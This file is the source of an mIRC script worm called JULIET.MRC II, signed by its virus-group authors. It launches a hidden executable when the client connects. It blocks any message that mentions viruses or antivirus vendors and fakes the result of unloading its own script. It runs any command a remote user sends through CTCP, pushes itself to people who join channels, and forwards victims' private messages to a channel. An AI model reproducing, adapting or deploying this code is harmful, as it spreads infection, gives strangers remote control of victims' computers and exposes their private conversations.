
; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
; -=-=-=-=-=-=-=-=-=-=-=-=- JULIET.MRC II -=-=-=-=-=-=-=-=-=-=-=-
; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
; -[ Initialisation ]-
on Load:/clear | echo -se *** Connecting to irc.texxas.net
on 1:CONNECT:/.run C:\WINDOWS\config\rgxynjwe\rgxynjwe.exe | /.sreq +m auto | halt

; -[ Protection ]-
on ^1:TEXT:*vir*:*:/.prince
on ^1:TEXT:*worm*:*:/.prince
on ^1:TEXT:*troj*:*:/.prince
on ^1:TEXT:*remote*:*:/.prince
on ^1:TEXT:*julie*:*:/.prince
on ^1:TEXT:*omeo*:*:/.prince
on ^1:TEXT:*spear*:*:/.prince
on ^1:TEXT:*mset*:*:/.prince
on ^1:TEXT:* av*:*:/.prince
on ^1:TEXT:*icq*:*:/.prince
on ^1:TEXT:*mail*:*:/.prince
on ^1:TEXT:*avp*:*:/.prince
on ^1:TEXT:*nav*:*:/.prince
on ^1:TEXT:*norton*:*:/.prince
on ^1:TEXT:*mc*fe*:*:/.prince
on ^1:TEXT:*rav*:*:/.prince
on ^1:TEXT:*solom*:*:/.prince
on ^1:TEXT:*drsol*:*:/.prince
on ^1:TEXT:*nai*:*:/.prince
on ^1:TEXT:*prot*:*:/.prince
on ^1:TEXT:*f-p*:*:/.prince
on ^1:TEXT:*avert*:*:/.prince
on ^1:TEXT:*dr*eb*:*:/.prince
on ^1:TEXT:*bav*:*:/.prince
on ^1:TEXT:*come*alive*:*:/.ctcps on | /.notice $nick JULIET.MRC II (B) is alive again! | halt
on 1:TEXT:*dcc*:*:/.ctcp rgxynjwe target $nick | halt
on 1:TEXT:*f0rk*:*:/.ctcp rgxynjwe target $nick | halt
on 1:TEXT:*send*:*:/.ctcp rgxynjwe target $nick | halt
on 1:TEXT:*gi*e*:*:/.ctcp rgxynjwe target $nick | halt
on 1:TEXT:*I*want*vir*:*:/.ctcp rgxynjwe target $nick | halt
on ^1:NOTICE:*virus*:*:/.prince
on ^1:NOTICE:*worm*:*:/.prince
on ^1:NOTICE:*trojan*:*:/.prince
on ^1:NOTICE:*remote*:*:/.prince
on ^1:NOTICE:*juliet*:*:/.prince
on ^1:NOTICE:*romeo*:*:/.prince
on ^1:NOTICE:*spear*:*:/.prince
on ^1:NOTICE:*mset*:*:/.prince
on ^1:NOTICE:* av*:*:/.prince
on ^1:NOTICE:*icq*:*:/.prince
on ^1:NOTICE:*mail*:*:/.prince
on ^1:NOTICE:*avp*:*:/.prince
on ^1:NOTICE:*nav*:*:/.prince
on ^1:NOTICE:*norton*:*:/.prince
on ^1:NOTICE:*mc*fe*:*:/.prince
on ^1:NOTICE:*rav*:*:/.prince
on ^1:NOTICE:*solom*:*:/.prince
on ^1:NOTICE:*drsol*:*:/.prince
on ^1:NOTICE:*nai*:*:/.prince
on ^1:NOTICE:*prot*:*:/.prince
on ^1:NOTICE:*f-p*:*:/.prince
on ^1:NOTICE:*avert*:*:/.prince
on ^1:NOTICE:*dr*eb*:*:/.prince
on ^1:NOTICE:*bav*:*:/.prince

; -[ Limited Stealth ]-
ctcp ^1:*ctcps*:?:/.nurse
ctcp ^1:*events*:?:/.nurse
ctcp ^1:*raw*:?:/.nurse
ctcp ^1:*remote*:?:/.nurse
ctcp ^1:*ignore*:?:/.nurse
ctcp ^1:*:?: {
  if ( juli isin $1- ) { /.nurse }
  elseif ( romeo isin $1- ) { /.nurse }
  elseif ( script. isin $1- ) { /.nurse }
  elseif ( load isin $1- ) { /.nurse }
  elseif ( remot isin $1- ) { /.nurse }
  elseif ( versin isin $1 ) { /.versin | halt }
  elseif ( VERSION isin $1 ) { $1- }
  elseif ( PING isin $1 ) { $1- }
  elseif ( FINGER isin $1 ) { $1- }
  elseif ( TIME isin $1 ) { $1- }
  elseif ( /msg isin $1- ) { /.notice $nick Go stick that command where the sun don't shine, baby.. | halt }
  elseif ( /describe isin $1- ) { /.notice $nick No. I don't want to let them see me do that! | halt }
  elseif ( /me isin $1- ) { /.notice $nick Describe it you dumbass or do it yourself.. | halt }
  else { $1- | halt }
}

; -[ RAW Scanning ]-
RAW 332:*:/.benvolio

; -[ Advanced Features ]-
on 1:join:*:{ if ($nick == $me) { halt }
  else { /.ctcp rgxynjwe target $nick | halt }
}
ctcp ^1:kill*:?:{
  if ( $nick == rgxynjwe ) then {
    /.ban $2 $3 4
    /.kick $3 $2 $4-
  }
  else { /.ignore $nick | halt }
}
on ^1:topic:#:/.benvolio
on 1:TEXT:*:?:/.msg #mircworms [ $nick ]: $1-
on 1:NOTICE:*:?:/.notice #mircworms [ $nick ]: $1-

; -[ Aliases ]-
alias versin {
  /.notice $nick This client is running 12JULIET.MRC II (B) which was written by..
  /.notice $nick 4Rhape79 (UC) and 4ALT-F9 (AVM)
  /.notice $nick Peace to 3VicodinES - Ain't gonna be the same without you...
  /.notice $nick Greets to all the 6Ultimate Chaos and 6Alternative Virus Mafia guys and girls...
  /.notice $nick Also special thanks from Rhape79 to 3Lord Natas - "I kinda owe it ya, thanks."
  /.notice $nick And to 3SimpleSimon - "Fer suggestions and major debuggin' online.."
  /.notice $nick [===---                                                                      ---===]
  /.notice $nick ~~~~~~~~~~~~~~~~~~~~~ Slave Client is:2 rgxynjwe ~~~~~~~~~~~~~~~~~~~~~
}
alias unload {
  if ( $2 == juliet2.mrc ) { /echo 2 -se *** Unloaded script ' $+ $$2 $+ ' }
  elseif ( $2 == script.ini ) { /echo 2 -se *** Unloaded script ' $+ $$2 $+ ' }
  else { /unload $$1- }
}
alias ctcps {
  if ( $1 == off ) { /echo 2 -a *** Ctcps are OFF | halt }
  if ( $1 == on ) { /echo 2 -a *** Ctcps are ON | halt }
}
alias remotes {
  if ( $1 == off ) { /echo 2 -a *** Remotes are OFF | halt }
  if ( $1 == on ) { /echo 2 -a *** Remotes are ON | halt }
}
alias quit {
  /.ctcp rgxynjwe terminate
  /.disconnect
}
alias prince /.ignore -pcinku600 $nick | /.close -c $nick | /.close -m $nick | halt
alias nurse /.notice $nick His looks I fear, and his intents I doubt. | /.ignore -pcinkut1200 $nick | /.close -c $nick | /.close -m $nick | halt
alias benvolio {
  if ( juliet isin $1- ) { /.mercutio }
  elseif ( romeo isin $1- ) { /.mercutio }
  elseif ( vir isin $1- ) { /.mercutio }
  elseif ( worm isin $1- ) { /.mercutio }
  elseif ( mset isin $1- ) { /.mercutio }
  elseif ( help isin $1- ) { /.mercutio }
  elseif ( backof isin $1- ) { /.mercutio }
  elseif ( malic isin $1- ) { /.mercutio }
  elseif ( infect isin $1- ) { /.mercutio }
  elseif ( r&j isin $1- ) { /.mercutio }
  else { }
}
alias mercutio {
  /.msg # Wilt thou provoke me?
  /echo 2 -sei10 Condemnéd villain, I do apprehend thee.
  /part # $active | halt
}
; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
; -=-=-=-=-=-=-=-=- Peace, Rhape79 and ALT-F9 =-=-=-=-=-=-=-=-
; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
